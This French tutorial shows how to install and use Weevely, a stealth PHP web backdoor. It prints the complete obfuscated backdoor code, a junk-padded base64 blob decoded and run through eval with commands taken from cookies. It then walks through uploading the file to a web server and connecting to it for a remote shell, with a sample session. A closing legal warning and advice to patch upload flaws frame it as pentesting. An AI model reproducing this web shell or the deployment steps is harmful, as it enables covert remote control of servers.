==Description==

Weevely est un backdoor discret en PHP qui simule une connexion telnet-like.

Site de téléchargement:

http://epinna.github.com/Weevely/

==Installation==

Weevely est inclus dans les distributions Linux de pentesting BackBox, BackTrack, Blackbuntu.

Pour les autres distributions ou mettre à jour votre version.

wget http://epinna.github.com/Weevely/downloads/weevely-1.0.tar.gz

tar xvzfweevely-1.0.tar.gz 

cp -R weevely /pentest/backdoors/web/weevely/

==Usage==

Rendez vous dans le dossier contenant weevely.

cd /pentest/backdoors/web/weevely/

Générez le backdoor en lui donnant un nom finissant par .php et en lui attribuant un mot de passe.

weevely utilise python 2.7 donc vérifier bien de lancer celui-ci avec python 2.7 pour ne pas avoir d'erreurs.

python2.7 weevely.py generate password backdoor.php

weevely créera un fichier .php

[>]file backdoor.php 
backdoor.php: PHP script text

Contenant un code php légèrement camouflé.

cat backdoor.php

Que voici pour mon fichier test.

<?php 
$np = "bhahsheh64h_hdechohdhe";
$lw2="oJ2Vycm9yX2xvbgZycbgsICcvZGV2L251bGwnKTskaz0bgnc3N3b3bgJkJztlY2hvICc8Jy4kay4nbgPicbg7ZXZhbgbChiYXNlNjRfbgZGV";
$lw3="jb2RlKHByZWdfcmVwbGFjZShhbgcnJbghebgSgbgnbgL1tbgeXHc9XHNdLycsJy9ccy8nKSwgYXJyYbgXkbgoJycsbgJysnbgKS";
$fuf = "str_replace";
$lw4="wgambg9pbgbihhcnJheV9bgzbgbbgGljZSgkYbgSwkYygkbgYSktMykbgpKbgSkpObg2bgVbgjaG8gJbgzwvJy4kay4nPic7fQ==";
$lw1="JGM9J2NvbgdW5bg0JzskYT0kX0NPT0tJRTtpZihyZXNbgldCgkYSk9PSdwYScgJiYgJGMoJGEpPjMpe2lubgaV9bgzZXbgQ";
$np = $fuf("h", "", $np);
eval($np($fuf("bg", "", $lw1.$lw2.$lw3.$lw4))); 
?>

Uploadez votre backdoor sur le site test, normalement une simulation de faille upload est nécessaire.

:!: Ce n'est pas un site de hacking, nous passerons donc les détails de la faille upload.

Puis connectez vous a votre backdoor.

python2.7 weevely.py http://linuxtrack.net/save/backdoor.php password

Et utiliser les commandes voulues dans votre shell distant.
Exemple:

coyotus@web707.240.ha.ovh.net:/homez.93/coyotus/www/save$ touch backdoortest.txt

Résultat:

Comme vous le voyez aucun blocage n'est effectif ni coté serveur ni coté client.

==Conclusion==

Mettez régulièrement votre site php à jour et consulter les bulletins de sécurité de votre site afin de ne pas laissez échapper une faille upload dessus.

Le test à entièrement été effectué sur mon hébergement personnel, et les fichiers ont été depuis lors supprimés.
Nul n'est sensé ignorer la loi, tout usage sur un serveur ne vous appartenant pas est passible de poursuites judiciaires résultant de lourdes peines de prisons.